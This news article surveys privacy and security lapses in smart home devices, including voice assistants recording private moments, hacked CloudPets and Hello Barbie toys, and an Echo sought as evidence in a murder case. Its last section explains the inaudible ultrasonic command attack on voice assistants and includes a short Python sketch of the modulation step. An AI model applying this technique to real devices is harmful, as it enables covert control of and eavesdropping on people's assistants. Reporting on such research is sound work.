The expansion of home tech products designed to make life ever more convenient demands sacrifices of consumer privacy, the full extent of which won’t be revealed for years to come but has already been hinted at by a slew of missteps.

This past week Amazon hit the headlines after its virtual assistant Alexa was caught passively recording couples arguing, having intimate family discussions and even having sex (apparently sex noises can trigger Alexa-activated Echo speakers).


Data is the new dominant commodity of the 21st century and the trade-off of convenience for privacy and security has been highlighted in a plethora of cases involving consumer ‘smart products’ in recent years.

Amazon Echo as murder witness?

Take the November 2015 case of James Bates, who was suspected of murdering his friend Victor Collins at a house party at his home. Police issued multiple search warrants to Amazon in the landmark case, in an attempt to gain access to the records of Bates’ Echo device.

“I have a problem that a Christmas gift that is supposed to better your life can be used against you,” Bates’ attorney, Kimberly Weber, said at the time. Eventually, Bates himself decided to turn over the data, forgoing his right to privacy in the interest of proving his innocence and clearing his name.


Siri’s sensitive recordings

Much like Amazon, Apple has been found surreptitiously recording users’ sexual encounters, drug deals and medical appointments, though more worryingly, these audio recordings were sent to human ‘graders’ for evaluation, according to recent, explosive revelations from a whistleblower.


Apple’s virtual assistant Siri stores users’ identifiable utterances for up to six months, before removing the unique user ID information and storing the clips elsewhere for up to two years – in the interest of improved customer experience, of course.

Google Home Mini & passive spying

Google’s domestic virtual assistant, the Google Home Mini, has also been caught passively spying on consumers in their own homes. Worryingly, Google employs hundreds of so-called “language experts” to parse snippets of audio, some of which contain embarrassing or sensitive information, to better understand the nuances of human language.

In 2017, writer Artem Russakovskii went to the product’s unveiling at the SFJazz Center in San Francisco. A couple of days later, he checked his voice activity log to find thousands of inadvertent entries that should never have been logged; the device had been spying on him 24/7 due to an apparent ‘hardware flaw’, as the company claimed at the time.

Hacking tech teddies

The idea for a teddy bear that allowed parents and children to share affection when long distances apart was good in theory, but ultimately proved terrifying in practice.


Through CloudPets (and various other interpretations of the idea), children could record short messages for loved ones far away that would be transmitted via Bluetooth to a nearby smartphone and beamed across the country or, indeed, the world.

Alas, it didn’t take long before data belonging to some 800,000 customers, comprising roughly two million messages between children and adults stored in an online database, was hacked and held for ransom.

There was no encryption or authentication between the Bluetooth devices in the stuffed animals and the smartphone app, meaning unscrupulous actors could invade people’s most heartfelt moments with their children.

Backdoor Barbie

Mattel's ‘Hello Barbie’ was billed as the world’s first “interactive doll” complete with a microphone that records children and sends the messages to third parties for processing before a response is generated.

However, security researchers quickly discovered that the Wi-Fi-connected doll was vulnerable to hacking, and those with the relevant knowhow could access the doll’s system information, account information, stored data including audio files, and the doll’s built-in microphone.

Researcher Matt Jakubowski claimed that it was “just a matter of time until we are able to replace their servers with ours and have her say anything we want.”

But the ghoulish details didn’t stop there; hackers could theoretically take over a home’s Wi-Fi network via the doll and gain access to other connected devices such as laptops and phones, allowing them to pilfer a wealth of personal and financial information.

High-tech takeover

White-hat hacking work by a team of researchers at China’s Zhejiang University showed how inaudible “commands” could be used to remotely trigger a potential victim’s smart device. The team used various clever strategies, including modulating voice commands onto ultrasonic carriers above 20kHz; the microphone’s own hardware demodulates the signal back into the audible band, so the device registers a command its owner never hears.
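The core trick, amplitude-modulating an audible voice command onto an ultrasonic carrier, can be illustrated with a minimal sketch. This is an assumption-laden toy, not the researchers’ code: it uses numpy, a hypothetical `modulate_ultrasonic` helper, and a pure tone standing in for a recorded command.

```python
import numpy as np

FS = 192_000        # sample rate high enough to represent ultrasonic content
CARRIER_HZ = 30_000  # carrier above human hearing (~20 kHz ceiling)

def modulate_ultrasonic(voice: np.ndarray, fs: int = FS,
                        carrier_hz: float = CARRIER_HZ) -> np.ndarray:
    """Amplitude-modulate a baseband voice signal onto an ultrasonic carrier.

    The output is inaudible to humans, but a microphone's nonlinear response
    can demodulate it back into the audible band, where the assistant's
    speech recogniser picks it up as an ordinary spoken command.
    """
    t = np.arange(len(voice)) / fs
    carrier = np.cos(2 * np.pi * carrier_hz * t)
    m = 0.8  # modulation index (illustrative value)
    normalised = voice / np.max(np.abs(voice))
    return (1.0 + m * normalised) * carrier  # classic AM: (1 + m*v) * carrier

# A 1 kHz tone stands in for a recorded voice command.
t = np.arange(int(0.5 * FS)) / FS
voice = np.sin(2 * np.pi * 1000 * t)
signal = modulate_ultrasonic(voice)
```

All of the signal’s energy sits around the 30kHz carrier, so a bystander hears nothing, which is what makes the attack so hard to detect in practice.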

The researchers managed to hack the voice interfaces of Amazon, Apple, Google, Microsoft and Samsung devices and command them to, for example, visit specific malicious websites or even send emails and text messages, all while dimming the screen and lowering the device volume to conceal the attack, leaving the victim completely unaware.

The team even managed to remotely place phone and video calls to listen in on and observe the victim’s surroundings. They also, famously, managed to hack the navigation system of an Audi SUV.
